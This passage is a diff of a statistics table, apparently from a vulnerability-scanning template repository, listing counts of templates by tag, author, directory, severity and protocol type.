| | | | | -| odoo | 2 | 0xrod | 1 | | | | | | | -| azure | 2 | willd96 | 1 | | | | | | | -| pega | 2 | bad5ect0r | 1 | | | | | | | -| bigip | 2 | intx0x80 | 1 | | | | | | | -| injection | 2 | ajaysenr | 1 | | | | | | | -| dos | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| jsf | 2 | b0rn2r00t | 1 | | | | | | | -| middleware | 2 | rodnt | 1 | | | | | | | -| mcafee | 2 | sullo | 1 | | | | | | | -| ecology | 2 | naglinagli | 1 | | | | | | | -| glassfish | 2 | manuelbua | 1 | | | | | | | -| hpe | 2 | pdp | 1 | | | | | | | -| netis | 2 | patralos | 1 | | | | | | | -| rstudio | 2 | petruknisme | 1 | | | | | | | -| igs | 2 | chron0x | 1 | | | | | | | -| linkerd | 2 | flag007 | 1 | | | | | | | -| hoteldruid | 2 | mhdsamx | 1 | | | | | | | -| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | -| axis | 2 | rojanrijal | 1 | | | | | | | -| voipmonitor | 2 | ahmed sherif | 1 | | | | | | | -| kibana | 2 | philippdelteil | 1 | | | | | | | -| phpcollab | 2 | micha3lb3n | 1 | | | | | | | -| backdoor | 2 | wabafet | 1 | | | | | | | -| paloalto | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| xxljob | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | bolli95 | 1 | | | | | | | -| webcam | 2 | absshax | 1 | | | | | | | -| emerge | 2 | tirtha_mandal | 1 | | | | | | | -| hasura | 2 | 0h1in9e | 1 | | | | | | | -| shellshock | 2 | gboddin | 1 | | | | | | | -| strapi | 2 | yavolo | 1 | | | | | | | -| idrac | 2 | fopina | 1 | | | | | | | -| showdoc | 2 | makyotox | 1 | | | | | | | -| chamilo | 2 | tim_koopmans | 1 | | | | | | | -| horde | 2 | thezakman | 1 | | | | | | | -| hjtcloud | 2 | ringo | 1 | | | | | | | -| ucmdb | 2 | sec_hawk | 1 | | | | | | | -| akamai | 2 | furkansenan | 1 | | | | | | | -| kentico | 2 | qlkwej | 1 | | | | | | | -| smtp | 2 | whynotke | 1 | | | | | | | -| hashicorp | 2 | geraldino2 | 1 | | | | | | | -| activemq | 2 | taielab | 1 | | | | | | | -| huawei | 2 | jeya seelan | 1 | | | | | | | -| cache | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | elmahdi | 1 | | | | | | | -| fortios | 2 | s1r1u5_ | 1 | | | | | | | -| etouch | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| bash | 1 | becivells | 1 | | | | | | | -| 74cms | 1 | izn0u | 1 | | | | | | | -| smartblog | 1 | j33n1k4 | 1 | | | | | | | -| cloudflare | 1 | b0yd | 1 | | | | | | | -| api-manager | 1 | ooooooo_q | 1 | | | | | | | -| clink-office | 1 | raesene | 1 | | | | | | | -| codeigniter | 1 | kareemse1im | 1 | | | | | | | -| solarlog | 1 | borna nematzadeh | 1 | | | | | | | -| interlib | 1 | andirrahmani1 | 1 | | | | | | | -| primetek | 1 | schniggie | 1 | | | | | | | -| nexusdb | 1 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| prtg | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| cves2016 | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| ilo | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | +| cve2021 | 115 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 93 | 0x_akoko | 33 | miscellaneous | 24 | | | | | +| config | 93 | ice3man | 26 | iot | 23 | | | | | +| cve2018 | 82 | organiccrap | 24 | dns | 11 | | | | | +| joomla | 74 | philippedelteil | 23 | cnvd | 9 | | | | | +| apache | 68 | sheikhrishad | 15 | fuzzing | 9 | | | | | +| takeover | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 65 | techbrunchfr | 13 | | | | | | | +| cve2010 | 64 | pr3r00t | 13 | | | | | | | +| default-login | 63 | suman_kar | 12 | | | | | | | +| iot | 62 | cyllective | 11 | | | | | | | +| oob | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| file | 46 | wdahlenb | 10 | | | | | | | +| unauth | 45 | righettod | 10 | | | | | | | +| network | 41 | nadino | 9 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| | 36 | melbadry9 | 9 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| ssrf | 35 | aashiq | 8 | | | | | | | +| cve2016 | 32 | iamthefrogy | 8 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 30 | oppsec | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 25 | emadshanab | 7 | | | | | | | +| misc | 23 | dr_set | 7 | | | | | | | +| disclosure | 21 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 21 | kophjager007 | 7 | | | | | | | +| auth-bypass | 20 | harshbothra_ | 7 | | | | | | | +| generic | 20 | puzzlepeaches | 6 | | | | | | | +| router | 19 | __fazal | 6 | | | | | | | +| aem | 19 | meme-lord | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| sap | 18 | logicalhunter | 6 | | | | | | | +| springboot | 17 | yanyun | 5 | | | | | | | +| debug | 16 | elsfa7110 | 5 | | | | | | | +| cve2014 | 15 | iamnoooob | 5 | | | | | | | +| misconfig | 15 | pentest_swissky | 5 | | | | | | | +| cve2011 | 14 | panch0r3d | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| android | 13 | lu4nx | 4 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| struts | 13 | github.com/its0x08 | 4 | | | | | | | +| fuzz | 13 | e_schultze_ | 4 | | | | | | | +| adobe | 13 | nodauf | 4 | | | | | | | +| devops | 13 | jarijaas | 3 | | | | | | | +| jenkins | 12 | binaryfigments | 3 | | | | | | | +| dlink | 12 | mavericknerd | 3 | | | | | | | +| dns | 12 | impramodsargar | 3 | | | | | | | +| cve2013 | 11 | vsh00t | 3 | | | | | | | +| zoho | 11 | yash anand @yashanand155 | 3 | | | | | | | +| dell | 10 | johnk3r | 3 | | | | | | | +| aws | 10 | dudez | 3 | | | | | | | +| xxe | 9 | shifacyclewala | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| ftp | 9 | incogbyte | 3 | | | | | | | +| airflow | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | emenalf | 3 | | | | | | | +| nginx | 8 | idealphase | 3 | | | | | | | +| scada | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| intrusive | 8 | shine | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| vmware | 7 | thomas_from_offensity | 3 | | | | | | | +| cve2009 | 7 | fyoorer | 3 | | | | | | | +| kubernetes | 7 | hetroublemakr | 2 | | | | | | | +| confluence | 7 | ree4pwn | 2 | | | | | | | +| backup | 7 | koti2 | 2 | | | | | | | +| coldfusion | 7 | bing0o | 2 | | | | | | | +| ibm | 7 | cocxanh | 2 | | | | | | | +| google | 7 | swissky | 2 | | | | | | | +| cms | 7 | 0xprial | 2 | | | | | | | +| netgear | 7 | dheerajmadhukar | 2 | | | | | | | +| files | 7 | lotusdll | 2 | | | | | | | +| rconfig | 6 | whoever | 2 | | | | | | | +| jetty | 6 | w4cky_ | 2 | | | | | | | +| solr | 6 | arcc | 2 | | | | | | | +| laravel | 6 | amsda | 2 | | | | | | | +| citrix | 6 | randomrobbie | 2 | | | | | | | +| django | 6 | alifathi-h1 | 2 | | | | | | | +| api | 6 | davidmckennirey | 2 | | | | | | | +| cve2008 | 6 | moritz nentwig | 2 | | | | | | | +| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| nodejs | 5 | random-robbie | 2 | | | | | | | +| drupal | 5 | joeldeleep | 2 | | | | | | | +| wp-theme | 5 | socketz | 2 | | | | | | | +| java | 5 | mohammedsaneem | 2 | | | | | | | +| deserialization | 5 | 0xsapra | 2 | | | | | | | +| tomcat | 5 | udit_thakkur | 2 | | | | | | | +| iis | 5 | huowuzhao | 2 | | | | | | | +| jolokia | 5 | ehsahil | 2 | | | | | | | +| lucee | 5 | x1m_martijn | 2 | | | | | | | +| printer | 5 | parth | 2 | | | | | | | +| circarlife | 5 | 0xcrypto | 2 | | | | | | | +| ssti | 5 | r3naissance | 2 | | | | | | | +| microsoft | 5 | gal nagli | 2 | | | | | | | +| windows | 5 | unstabl3 | 2 | | | | | | | +| fileupload | 5 | hahwul | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| headless | 5 | convisoappsec | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| strapi | 4 | nkxxkn | 2 | | | | | | | +| proxy | 4 | fabaff | 2 | | | | | | | +| exchange | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | afaq | 2 | | | | | | | +| hp | 4 | pxmme1337 | 2 | | | | | | | +| webserver | 4 | sushantkamble | 2 | | | | | | | +| vpn | 4 | g4l1t0 | 2 | | | | | | | +| asp | 4 | zomsop82 | 2 | | | | | | | +| crlf | 4 | bsysop | 2 | | | | | | | +| hongdian | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | johnjhacking | 2 | | | | | | | +| thinkphp | 4 | vavkamil | 2 | | | | | | | +| symfony | 4 | gevakun | 2 | | | | | | | +| elastic | 4 | bp0lr | 2 | | | | | | | +| symantec | 4 | 0xelkomy | 2 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| zimbra | 4 | b0rn2r00t | 1 | | | | | | | +| glpi | 4 | mubassirpatel | 1 | | | | | | | +| buffalo | 4 | yavolo | 1 | | | | | | | +| solarwinds | 4 | shifacyclewla | 1 | | | | | | | +| artifactory | 4 | deena | 1 | | | | | | | +| firmware | 4 | akash.c | 1 | | | | | | | +| magmi | 4 | absshax | 1 | | | | | | | +| wso2 | 4 | c3l3si4n | 1 | | | | | | | +| thinkcmf | 4 | geraldino2 | 1 | | | | | | | +| resin | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| samsung | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| cacti | 3 | mah3sec_ | 1 | | | | | | | +| druid | 3 | andysvints | 1 | | | | | | | +| zabbix | 3 | ahmed sherif | 1 | | | | | | | +| ofbiz | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| kevinlab | 3 | remonsec | 1 | | | | | | | +| kibana | 3 | elder tao | 1 | | | | | | | +| opensis | 3 | sicksec | 1 | | | | | | | +| linkerd | 3 | shreyapohekar | 1 | | | | | | | +| bypass | 3 | fmunozs | 1 | | | | | | | +| microstrategy | 3 | vzamanillo | 1 | | | | | | | +| smtp | 3 | andirrahmani1 | 1 | | | | | | | +| mongodb | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| prometheus | 3 | streetofhackerr007 | 1 | | | | | | | +| r-seenet | 3 | blckraven | 1 | | | | | | | +| springcloud | 3 | co0nan | 1 | | | | | | | +| targa | 3 | @dwisiswant0 | 1 | | | | | | | +| ssh | 3 | kba@sogeti_esec | 1 | | | | | | | +| terramaster | 3 | iampritam | 1 | | | | | | | +| openssh | 3 | b0yd | 1 | | | | | | | +| bigip | 3 | @github.com/defr0ggy | 1 | | | | | | | +| telerik | 3 | jeya seelan | 1 | | | | | | | +| nacos | 3 | ringo | 1 | | | | | | | +| injection | 3 | revblock | 1 | | | | | | | +| camera | 3 | udyz | 1 | | | | | | | +| itop | 3 | s1r1u5_ | 